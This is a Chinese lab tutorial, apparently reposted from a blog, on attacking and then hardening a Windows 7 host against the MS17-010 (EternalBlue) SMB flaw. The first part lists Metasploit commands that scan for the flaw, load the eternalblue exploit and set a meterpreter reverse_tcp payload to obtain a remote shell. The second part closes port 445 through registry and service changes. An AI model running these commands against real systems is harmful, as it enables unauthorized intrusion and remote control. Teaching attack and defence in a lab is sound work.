任務(wù)1?利用永恒之藍(lán)攻擊Win7系統(tǒng)
在Kali終端中輸入命令“msfconsole ”,啟動(dòng)Metasploit;輸入命令“use auxiliary/scanner/smb/smb_ms17_010”,加載掃描模塊;輸入命令“set RHOSTS 192.168.0.6”,設(shè)置需要被掃描的目標(biāo)主機(jī)地址;輸入命令“run”,進(jìn)行掃描并觀察是否存在該漏洞
?
輸入命令“use exploit/windows/smb/ms17_010_eternalblue”,加載攻擊模塊;輸入命令“set RHOSTS 192.168.0.6”,設(shè)置目標(biāo)主機(jī)地址;輸入命令“set payload windows/x64/meterpreter/reverse_tcp”,設(shè)置攻擊載荷;輸入命令“set LHOST 192.168.0.4”,設(shè)置監(jiān)聽(tīng)主機(jī)地址;輸入命令“show options”,查看滲透攻擊模塊和攻擊載荷所配置的情況,確保沒(méi)有錯(cuò)誤
輸入命令“exploit”,實(shí)施攻擊,如果攻擊成功,我們將得到一個(gè)meterpreter
?
任務(wù)2?關(guān)閉445端口消除ms17-010漏洞
?
在Win7中調(diào)用“cmd命令行”,輸入命令“netstat -an”,來(lái)查看下系統(tǒng)當(dāng)前開(kāi)放的端口,135、445端口均打開(kāi)。
?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters”,進(jìn)入NetBT這個(gè)服務(wù)的相關(guān)注冊(cè)表項(xiàng)
在Parameters這個(gè)子項(xiàng)的右側(cè),點(diǎn)擊鼠標(biāo)右鍵,“新建”,“QWORD(64位)值”,然后重命名為“SMBDeviceEnabled”,再把這個(gè)子鍵的值改為0。
?
找到“server服務(wù)”,雙擊進(jìn)入管理控制頁(yè)面。把這個(gè)服務(wù)的啟動(dòng)類(lèi)型更改為“禁用”,服務(wù)狀態(tài)更改為“停止”,最后點(diǎn)擊“應(yīng)用”按鈕
重新啟動(dòng)操作系統(tǒng)發(fā)現(xiàn),445端口已經(jīng)關(guān)閉
再次對(duì)該漏洞進(jìn)行掃描,發(fā)現(xiàn)找不到該漏洞了。
文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-447409.html
??文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-447409.html
到了這里,關(guān)于MS17-010漏洞攻擊與防御(利用永恒之藍(lán)攻擊Win7系統(tǒng))的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!